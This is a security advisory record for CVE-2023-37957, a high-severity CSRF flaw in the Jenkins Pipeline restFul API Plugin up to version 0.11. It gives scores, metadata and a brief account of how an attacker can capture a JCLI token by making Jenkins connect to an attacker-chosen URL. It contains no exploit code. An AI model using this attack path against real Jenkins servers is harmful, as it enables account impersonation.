CVE-2023-37957 – io.jenkins.plugins:pipeline-restful-api

Package

Manager: maven
Name: io.jenkins.plugins:pipeline-restful-api
Vulnerable Version: >=0 <=0.11

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

EPSS: 0.0007 pctl0.2196

Details

Jenkins Pipeline restFul API Plugin vulnerable to Cross Site Request Forgery Jenkins Pipeline restFul API Plugin 0.11 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability. This vulnerability allows attackers to have Jenkins connect to an attacker-specified URL, capturing a newly generated JCLI token that allows impersonating the victim.

Metadata

Created: 2023-07-12T18:30:38Z
Modified: 2023-07-12T22:31:55Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-hmw6-r547-42fr/GHSA-hmw6-r547-42fr.json
CWE IDs: ["CWE-352"]
Alternative ID: GHSA-hmw6-r547-42fr
Finding: F007
Auto approve: 1